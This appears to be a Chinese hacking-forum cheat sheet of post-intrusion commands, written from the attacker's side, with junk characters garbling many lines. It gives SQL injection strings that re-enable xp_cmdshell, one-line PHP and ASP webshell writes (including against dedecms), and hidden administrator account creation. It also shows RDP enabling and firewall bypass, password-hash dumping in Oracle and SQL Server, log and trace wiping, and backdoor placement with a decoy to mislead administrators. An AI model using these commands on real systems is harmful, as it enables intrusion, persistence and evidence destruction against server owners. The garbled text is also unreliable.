" O4 Q2 G0 O+ i# c' J. M$ V
1.net user administrator /passwordreq:no
4 C) @; x8 w# t! b: ?4 v这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了9 p& s5 B- p$ A+ }3 U
2.比较巧妙的建克隆号的步骤) L @6 T/ ` H) n7 ~' m
先建一个user的用户
/ S& r* q8 _% ^ X) [7 ?然后导出注册表。然后在计算机管理里删掉' z4 v' `2 r6 E+ n' M$ @7 l
在导入,在添加为管理员组
- H% F! v. ]( x# H S/ F3.查radmin密码
( f3 w& I/ D4 S/ j+ U9 \8 a9 m _reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
1 ]9 \$ G5 b2 s4 Y/ m0 E' L d4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]0 _8 b _7 i, `2 q4 v3 P% f
建立一个"services.exe"的项& H& S# ^, `' j, s0 w
再在其下面建立(字符串值)
. ?9 Q& X4 P/ e; T键值为mu ma的全路径 N$ s* [' W6 ?9 Y8 N
5.runas /user:guest cmd
1 n5 C }( L1 v" V# o测试用户权限!% d7 _) e9 N: W! { n. d; Z
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
& A/ N2 u$ k! _3 N0 W0 G0 J7.入侵后漏洞修补、痕迹清理,后门置放:
5 `* j& i5 ^1 i2 H) d基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
$ A6 z" g6 p+ G w5 E8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
, G: I8 K8 x3 Q' Z' l+ E$ s' b& ~2 @. N2 C
for example
; X, c- C% N& U3 q9 B! o8 j
0 _ ~7 X& K! ]: }+ ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'7 |8 P& |% E: F+ ]4 z
" N/ n! |; R& V& p8 D! D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
, }% [, w% A. n5 F6 o2 g- L5 Y; k3 Z: {
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
4 c6 t4 l3 r8 S$ ]如果要启用的话就必须把他加到高级用户模式
x2 m; a _4 T. f; j0 m* w0 ~可以直接在注入点那里直接注入7 q9 ]: |1 A, f! b( o
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--6 Z% y2 k+ \) S" Y% b7 r0 M
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--: b" U) {2 g* H! } ]( l- `( q* b
或者
6 j6 ^/ g, u2 m5 ]* W/ Rsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% r9 H4 X) c% o% ?- d4 g6 W
来恢复cmdshell。" n& R2 G' e5 Q( B( A
. S6 Y$ b6 {' M% U& U. x; [
分析器' M" x2 H$ O/ A9 w# G: Y. c) W
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
% B' l7 B K; v5 Z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")4 H* x- Y o! u/ d! t4 R( Y
10.xp_cmdshell新的恢复办法
: Q6 F) I7 m! l2 Dxp_cmdshell新的恢复办法
. f0 M, Y' K+ I2 p扩展储存过程被删除以后可以有很简单的办法恢复:
8 k, w' C9 Q e/ S3 O$ a删除
. {3 f; E. Q$ Mdrop procedure sp_addextendedproc. d7 O0 ?& t9 Z
drop procedure sp_oacreate
6 _& l. d7 M9 n: [& t9 h# u3 A- o% E) @exec sp_dropextendedproc 'xp_cmdshell'$ a' y! H0 R1 x" ]+ w
0 f1 D# h& }7 a4 @# S1 ^# l6 m% e
恢复4 d0 ]8 o3 F; n3 m* j5 y3 ^0 G% K/ J
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
5 m0 b$ o; a, q: A0 o- Fdbcc addextendedproc ("xp_cmdshell","xplog70.dll")& G5 T5 S& K5 x( H' _( {
1 h+ \/ i% i ?* a5 Y
这样可以直接恢复,不用去管sp_addextendedproc是不是存在$ q; q: h6 Z8 X6 l6 a
! t- ~ Z2 v; T: z! I4 i-----------------------------
# J$ C P: W+ H" V6 V+ V% b! g; D4 B7 |- y
删除扩展存储过过程xp_cmdshell的语句:
5 K+ g% [8 X& O4 fexec sp_dropextendedproc 'xp_cmdshell'1 q2 B- [1 }3 C6 F: u7 M
. B4 d$ J0 `+ h' e! J/ e恢复cmdshell的sql语句
1 E5 A0 @& }& Y a! Iexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'; w; ]4 X2 [7 r v+ m
9 L( S5 y+ I$ I# V: X& }8 Q! d
& f: [; k& {& }开启cmdshell的sql语句
+ N# J y. f( D/ B8 Q+ P' I- p
6 L- [* b3 j" k2 g( O( jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': G6 i8 E8 ]; [; M2 n
: d9 d6 I/ [4 L- [) t1 u' J1 v判断存储扩展是否存在
% h( V5 | h3 y4 i2 xselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
* D3 d) C$ y; ]5 ?) ~返回结果为1就ok
4 I/ Z( J4 i: ~- F( y1 P( b7 c6 _% z, l7 g
恢复xp_cmdshell, f7 P, w( E1 d/ h
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
+ ?& f5 ?6 M) w# s& X/ ]" p% ~返回结果为1就ok* u# ~! z& i% e$ I1 J2 h& T
! P( m# j2 l, O1 a3 @" a; n9 s
否则上传xplog7.0.dll
; w$ l& {7 P+ R8 Y" r, iexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'* C/ E0 P2 Q) s0 C
# E5 J' D& t% [+ C' N
堵上cmdshell的sql语句
6 \, J2 \4 i+ K' w+ |4 ^* vsp_dropextendedproc "xp_cmdshel7 x4 v" r3 P, C, @% u
-------------------------
; s* e9 t) ?+ s& F. w! D清除3389的登录记录用一条系统自带的命令:; B* j- F% N0 M \
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
# j" U. L0 m1 m1 z' [$ r6 y5 a" T3 D# \) y/ B) _% \; o
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
O3 _% @, N- }% \ X在 mysql里查看当前用户的权限1 C A! r! R: u8 r. s- x2 C% _' Z8 F
show grants for . v2 C2 p. S6 v4 B# g
5 o8 ?" f/ v: C8 p+ q6 F; r
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
) w [' v; n+ L2 D6 }* Q$ b; r
# e- o% j% E$ R+ j' w! H \
Create USER 'itpro'@'%' IDENTIFIED BY '123';
- [$ @$ S5 y& z" H C; C+ C
; N% Z0 B s. }8 c; AGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION: K! p$ k& ~, p3 ~7 i) Z
. \7 {; q- @# p0 I$ t6 LMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0$ k9 A& W; k" F3 a' R
% {- y# S, N9 {
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 G, e" h$ J4 ]$ L6 `
7 K6 x% j. n& B: U* \. I7 `搞完事记得删除脚印哟。. ~" M: R) l# g+ D' N0 I' @
7 P, H" H2 @* iDrop USER 'itpro'@'%';
( b) _7 d P# [% f' ^
. M, o) U' Q1 a0 p# H3 p2 \/ _Drop DATABASE IF EXISTS `itpro` ;
. {* b! F' U2 e- p2 Q+ Z5 t: F/ c- L! E! T, Q
当前用户获取system权限+ I4 g8 @+ B3 Y" {) ?
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact5 k$ ]3 q4 M" t# M! k7 i- \+ B
sc start SuperCMD
5 p. S- z" s' r- b7 j程序代码* H1 B+ D9 m L- E- B
<SCRIPT LANGUAGE="VBScript">
- M3 T% @' }/ Q9 {3 Bset wsnetwork=CreateObject("WSCRIPT.NETWORK")
( n( x; D A2 `4 M8 g! Y/ J( O6 i) Eos="WinNT://"&wsnetwork.ComputerName
4 s3 r+ @2 |0 I$ D+ H# @Set ob=GetObject(os)1 J3 k1 z' F+ c4 W9 L
Set oe=GetObject(os&"/Administrators,group")3 j) g6 m* W+ ]" `0 `4 t( W% D: O
Set od=ob.Create("user","nosec")
) b4 X3 P4 @& \/ O$ c) l) cod.SetPassword "123456abc!@#"
& x: p# q+ U1 ^2 Hod.SetInfo
. M: j" |( t! l1 I: h: Z5 OSet of=GetObject(os&"/nosec",user)+ R. }& S5 O t7 [8 }/ I
oe.add os&"/nosec"6 i1 ^% M) K) a" B( M( e" R
</Script> S. z7 {5 |5 U1 b' U1 Z. b
<script language=javascript>window.close();</script>
3 T/ Q9 B( |- }% w) ?
" E: P* r. q8 a# x T
. t. L+ i5 Y) g" T, b, }3 I/ {" t+ W2 X+ j* n1 j# G2 e- g" i \
8 a2 _6 \3 y R; D q- J突破验证码限制入后台拿shell! B0 x/ W8 {; }' w/ E) y5 E& g+ l
程序代码! `0 h( I9 e8 I# K! S8 i) w' F
REGEDIT4
- e' i5 T0 _5 u6 \" q4 `2 J[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] , g! R3 Q. _" ^
"BlockXBM"=dword:00000000
0 `# |- b$ m, h$ y
& Y8 D' a# A5 X保存为code.reg,导入注册表,重器IE
9 p5 E2 w; a' ~6 s; p- d- | d就可以了/ f; {$ T0 K' y# ]% s( y/ J
union写马
* |% q7 Z4 q, {: T程序代码
+ O+ z% M6 s P% d* Nwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*% q; j4 S: U) |9 C4 z- Y
2 h) S. a2 O" t# _! C6 Y
应用在dedecms注射漏洞上,无后台写马
/ \+ b& u& v) A& K/ m, j/ adedecms后台,无文件管理器,没有outfile权限的时候" u* I7 g$ d1 W
在插件管理-病毒扫描里7 `# |! @# b& F% Z- R
写一句话进include/config_hand.php里
( k4 @+ O. M' p7 x0 }程序代码* z% ^$ Q1 K8 \9 r
>';?><?php @eval($_POST[cmd]);?>
4 z$ f9 b! S6 | N
6 k, H0 h9 y, n: t! F+ u6 T1 u% x9 o1 L% u9 L7 P, X$ o( V
如上格式
: R- z5 K1 b/ ?2 I9 t1 y' ^+ b/ m9 j
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解" {- T, w) x# R# ^
程序代码4 [* T& c9 `" I
select username,password from dba_users;
% |* f" i" R& T" J& o' k1 P% M6 f
( E$ i9 }! E3 m4 f3 D9 T( i* d- i. `$ {3 |( t
mysql远程连接用户+ T) H; l% }- g5 R h
程序代码* Y4 @8 w9 L' b: a
8 w6 H( T8 P. q8 e; LCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';+ W5 I2 a) N' o0 _$ ~+ t3 }
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
$ \' T( }/ Q$ `# U# Y$ bMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
3 [% T2 M1 J6 Q+ t G! V. X3 ^1 ]MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;! l2 x. C2 {# e( Y
* y1 E, e( `5 e' k( S( V
- p; E- y& r- H0 E( F6 v- F1 Q2 I% [, Q% g; P/ Z( G& }
, r) e6 Y, X$ f3 B( J
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
$ \7 h" |6 n& T
+ m1 q' P! b5 v: X1.查询终端端口
- ?) M/ f) H6 t& ^- l2 d' ~% ~7 b. }4 g+ G. U n3 l8 Z' z' `
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
3 P# a3 z4 p# V+ ^" L% h, q) ~
# ~7 c: ]3 T8 ^通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"1 u% C3 ]+ c8 q! Y( U1 J# d
type tsp.reg
- Q+ U8 U2 [' c$ u1 E
6 R5 k. C: [4 k9 p2.开启XP&2003终端服务
- i9 W0 M( @( O( D* T& @* H E6 x4 V# t/ I$ \4 L
- }; v8 v" E! w! g! b/ `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
; c% F5 o3 z3 N' A0 j5 L0 r9 A0 l# g7 ^/ v2 z0 B
( L' I0 e. d k) T7 I
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
6 ]1 J$ ^+ ^) J
' Q- g0 O/ R& V7 m1 O' {) |3.更改终端端口为20008(0x4E28)
2 B5 p0 U& O/ G+ K: L. {1 Z. ]
' y% v5 z" N+ U3 n5 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: M$ k; B4 n: v# ?7 L+ }1 p2 C5 {
3 i/ W: G0 k' q2 b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f ?0 f) |' @/ [6 L* u. p* Y
8 v. g. T; o; x7 M4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 V. K R7 g* p/ X: l$ ?6 R
5 L+ s5 B: }) T6 x) J4 bREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
# _7 ~4 y! ]' d( L' d7 `# @, w# \5 [; q
1 x1 o% F7 N& g/ E& L! }5.开启Win2000的终端,端口为3389(需重启)/ p8 T6 O* x3 k0 t* R
[4 z1 A/ G) V6 D) W% ~
echo Windows Registry Editor Version 5.00 >2000.reg ' R( I4 ^& o* G9 N1 x
echo. >>2000.reg
# g. }9 d' \6 F, vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
- u! k0 u0 b( W# Wecho "Enabled"="0" >>2000.reg
, |( l* O2 M3 }- R9 zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
, b; b( P* `% G8 Yecho "ShutdownWithoutLogon"="0" >>2000.reg ) d& j, l% A I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
8 t2 @& w/ }5 E) D0 W$ i# h* b0 mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg . [! Z1 I3 x( X& l; l2 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 9 \5 G6 x' a4 a @6 i
echo "TSEnabled"=dword:00000001 >>2000.reg $ X% I! F& M8 F1 ~1 U; H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ( o l r+ L, F; K& G
echo "Start"=dword:00000002 >>2000.reg : a7 k* U$ h+ t) e& z# E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
1 f I& B5 w9 _; Gecho "Start"=dword:00000002 >>2000.reg
9 D U R- ^" ]: F* T& `# b- Wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ! C2 f& ?. ?- R/ O, H- I
echo "Hotkey"="1" >>2000.reg
, v% L; H1 h: ^. ]. l; V, U5 L& d Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ! x* t: `. }8 q2 k9 z
echo "ortNumber"=dword:00000D3D >>2000.reg
+ _+ d; z" j2 s: {8 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
. [4 C+ g4 _( Becho "ortNumber"=dword:00000D3D >>2000.reg# h! G* ?* g' w) D" E4 {. F1 E
v" _$ @% ]/ w
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)! O( C0 m M, t: O
" {( w4 o8 J! a$ y' y
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
& c# k: M9 Q3 J T(set inf=InstallHinfSection DefaultInstall) n6 P# [. W5 B5 {
echo signature=$chicago$ >> restart.inf
# J1 O4 s: E% I: ]( ~echo [defaultinstall] >> restart.inf
1 x: |; |% F/ @, O$ y. A) ^rundll32 setupapi,%inf% 1 %temp%\restart.inf
& O* }/ t: B Y6 m; s* T% X. Y, M u
' k# {8 m! o5 y; o6 j$ u$ B3 M7.禁用TCP/IP端口筛选 (需重启)# B( X5 Z0 Q/ L; J) D0 ]
# {2 H- I# Q8 m
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8 L8 j5 R% h, i( n+ t5 b; p) {& \& {1 @6 k2 Y; F
8.终端超出最大连接数时可用下面的命令来连接3 W$ P& r d4 J7 o* Z- s% w! T
) z6 v& X# ]1 `" e6 wmstsc /v:ip:3389 /console
, I! m! D" D/ i. G" _* O3 |2 A% o1 J2 S3 V# n5 M3 S
9.调整NTFS分区权限4 {: |& Z l0 L9 z
9 R( Y: T% @' l( J' _, i% [
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)* W! t# z7 I2 t
- C. o' \+ L; L! vcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)3 I8 s+ i2 `5 Z4 Q0 z
7 i0 N4 ?" q. {* q* M------------------------------------------------------
2 B7 i% b" Q* Q3389.vbs
3 m, |, n' p' S+ b5 \8 N- @On Error Resume Next
2 `% x) t, k9 R8 bconst HKEY_LOCAL_MACHINE = &H80000002
, I% R9 o/ m0 B4 |0 HstrComputer = "."# g% }+ _4 [: y- t9 i
Set StdOut = WScript.StdOut4 h* M) K) q6 m7 k% l7 Z
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
9 i' |/ a( v8 y" q2 astrComputer & "\root\default:StdRegProv")
( Y) V) G) y1 z$ \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ |1 |. ^8 L4 H% y
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. Y2 J3 y7 U1 u/ Q4 Z n3 I, A
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
% i" a* ]7 q! o/ M; poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
: L* _. @" Q: x9 KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& u9 w8 {& u; astrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
1 ]- Z% Y* N) V- OstrValueName = "fDenyTSConnections"
1 H" a+ E0 V5 |7 v. g7 x( adwValue = 09 \" u) d$ R% a: r
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% u! t2 n- B# H6 J. u
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! k! V- s% i/ }+ V. R% a1 zstrValueName = "ortNumber", U: F+ U6 P/ F& @( P* p1 y
dwValue = 3389: g0 n9 t) P6 r# u% t
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue0 v) a% s" w" V! A2 C3 A1 A
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& A5 q U4 R1 @& G3 q- R. J1 UstrValueName = "ortNumber"- _6 A$ a/ q9 p) f; n- I
dwValue = 3389$ y) K+ p {0 e
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" H C2 p6 ^5 P0 nSet R = CreateObject("WScript.Shell")
# [6 x+ ^. P+ ^3 q! S" ?6 D, |. DR.run("Shutdown.exe -f -r -t 0") . a' `9 Z: C; |; E+ d
* d1 C# K1 P- R" Y' C) z7 ~
删除awgina.dll的注册表键值
5 P5 w4 w/ p' K5 j4 b1 o* c* T程序代码7 l$ R: d5 W3 J' o
8 o+ q# ?" N$ Y5 ^" M j" {
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
$ Z! {) h- v J7 z0 r5 i4 Y1 l- }$ u1 l+ L8 @3 T' ~# R
5 S+ p* C- {- _% B" r4 Z1 {# W9 w0 a: h: |7 G
5 n5 j- L, u# s! k; \
程序代码) H& r) v* e( u1 U* K5 v
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash! ?4 z7 M1 \; o6 V2 F. v
$ o/ {! E3 u9 Z* g5 I# M: v设置为1,关闭LM Hash% l/ @0 y3 {5 C0 U* M& m6 e- y/ m# R
9 C: z1 w! O7 n: ~. v5 g数据库安全:入侵Oracle数据库常用操作命令
; u8 o, @" {% a8 ]- t' |最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。: L* p8 @! i( O+ w4 [4 C$ V
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
/ c( i4 c8 O& H2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
6 X2 L6 i$ ?* A& Y% l. r* N3、SQL>connect / as sysdba ;(as sysoper)或
% }9 j2 n" `- K7 D" ~ I" Cconnect internal/oracle AS SYSDBA ;(scott/tiger)% C9 |6 p' m$ [+ ?" K7 Z
conn sys/change_on_install as sysdba;* k) b& _. O/ R6 I6 y) m* q
4、SQL>startup; 启动数据库实例
/ Q5 O- l5 K1 A5、查看当前的所有数据库: select * from v$database;
0 r! x s. q; g7 Q- [select name from v$database;
9 ?+ P6 G7 @% s. n# s6、desc v$databases; 查看数据库结构字段% x; ]! T0 l8 B0 R
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
Z9 B0 [% J1 l2 ^SQL>select * from V_$PWFILE_USERS;& @2 e4 H) a) X; F. k6 S
Show user;查看当前数据库连接用户+ w' r; E) B% I0 d
8、进入test数据库:database test;
% i2 _6 ^9 P4 ~$ k9、查看所有的数据库实例:select * from v$instance;% W; S- h* `5 z( n \% p
如:ora9i' F4 Q+ b) [% c, H+ e4 A
10、查看当前库的所有数据表:' h7 D7 }/ U/ y
SQL> select TABLE_NAME from all_tables;5 h8 ]6 X" Z6 i3 A6 X5 p+ q. y
select * from all_tables;, M1 Z, P& W4 e
SQL> select table_name from all_tables where table_name like '%u%';: W" o8 E9 A* ]" d
TABLE_NAME
) g g9 r5 X, J1 j. }8 @------------------------------
7 I f v! R9 l4 _* c+ `; y_default_auditing_options_
% T) h, T% p) q% w, ]11、查看表结构:desc all_tables;2 X! d2 \+ [' I; f* {+ _+ Y+ L
12、显示CQI.T_BBS_XUSER的所有字段结构:: ^' \( Y- I" c
desc CQI.T_BBS_XUSER;
! B- W; y& q: M2 |& g1 B, q' s: J13、获得CQI.T_BBS_XUSER表中的记录:. F% ?. t9 D$ }! b$ U# b* F
select * from CQI.T_BBS_XUSER;3 g# G' k2 J- V" Z( ^7 K0 D
14、增加数据库用户:(test11/test)9 i0 K# M( d6 H( L1 L3 @. g. Z
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;& w! B0 w) X; ?$ q1 {. y
15、用户授权:- ]$ Z4 o9 `0 }& E4 w# C5 R: Z
grant connect,resource,dba to test11;
' `, C! U$ B3 `; _5 K3 ]grant sysdba to test11;
0 N8 F- J8 g9 [& vcommit;
: x4 j% R9 m! n; e0 y5 D9 [16、更改数据库用户的密码:(将sys与system的密码改为test.)3 I- F! k2 e( _$ x; c
alter user sys indentified by test;9 C1 u+ P( y1 g `
alter user system indentified by test;2 I9 {" J$ x; j; _( p6 y
0 {6 q7 c" N+ s: o v: R+ aapplicationContext-util.xml3 b0 V0 |" D" |4 ]! O4 h/ [+ w
applicationContext.xml/ M/ ]) i! `# V7 [# [7 r
struts-config.xml5 T: V) ?7 y1 }/ C, k! a1 U
web.xml
) L7 b' L( l3 F* F, l/ N& M4 Hserver.xml
% d# h x# f3 N# m: D; Ytomcat-users.xml/ B2 v& |6 R" I1 K3 J2 `' Z3 w
hibernate.cfg.xml, ~' T! l2 O5 _" _, ~
database_pool_config.xml& I% D! o6 i& B( ?/ {
- j9 O7 ~: W2 H! b: b5 U H% }2 i. ]
9 B( B3 T% E1 q5 t\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
2 @2 V( s D0 x9 o\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
% G" H/ W9 ?9 M/ H\WEB-INF\struts-config.xml 文件目录结构
) v. q4 \6 Y% a3 }, _3 y! G7 Y* K' Y o& G; O
spring.properties 里边包含hibernate.cfg.xml的名称
- f; G; ^2 d$ K% U, M3 l# e) N% ], ?
" A4 j* X! J1 V2 T
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: f2 K3 |7 _6 f& D5 R$ W
) Z [$ {# T; n/ _9 V
如果都找不到 那就看看class文件吧。。
% g3 b& \, a- n5 l6 x: Q6 V* X o0 }" U- i6 m' C( g' t/ @
测试1:
4 w4 i6 x' x) H9 \; WSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# j; i) \% F6 w- w% ?
, L7 T1 G J( V! Y: m测试2:
u; s2 d, _7 E; S
- k: r: b" V) e$ Screate table dirs(paths varchar(100),paths1 varchar(100), id int)& R. n) J1 v) R; `8 O- m9 R' D3 S( c
3 E) g# T- I) h0 Z8 e* c$ _
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
& A. P' C, W9 }4 O: p2 d7 o" z7 C/ n8 z+ C. i% H K; ~3 ]- w
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 ^3 O7 ]9 h1 T, F6 c5 b6 Q- m
0 \, Y1 d/ F6 l" M; m1 y" J j
查看虚拟机中的共享文件:
! g5 n) F( ]: e2 [在虚拟机中的cmd中执行" }) {! a. d+ N
\\.host\Shared Folders/ c& l1 [/ b: B R: o1 ` Y f
1 o$ ?' T: d$ }$ Qcmdshell下找终端的技巧: H2 H1 | ], s+ k1 s/ R- d9 l
找终端: 8 R6 Q: D% G. r9 \- z3 n
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' ?+ ^ R- U3 Y3 g+ _/ U 而终端所对应的服务名为:TermService 5 T+ x* O. v/ N9 |$ l4 t) T7 V
第二步:用netstat -ano命令,列出所有端口对应的PID值! : R0 U8 M9 D3 K6 u: ^) f4 i( B5 N
找到PID值所对应的端口
, H/ j) j" q8 N5 ~, {+ ^9 C# q
3 ?. J. J" V3 J查询sql server 2005中的密码hash% D6 |. J7 {! x) Q, u( |$ r
SELECT password_hash FROM sys.sql_logins where name='sa'. J; w! h) y, }. q8 s. R: T
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- ]' E1 U, E3 b% jaccess中导出shell
" z: U) x- r( h. p. @, P# Z0 o$ z8 n
中文版本操作系统中针对mysql添加用户完整代码:
- G! Z' ^" o7 Q; _, J- y1 ?3 Y' ]: t1 y
- p& g% K" P0 L3 `8 \# uuse test;9 n3 Q1 V9 X, P* v3 J/ I) n" A' Q; z8 v
create table a (cmd text);
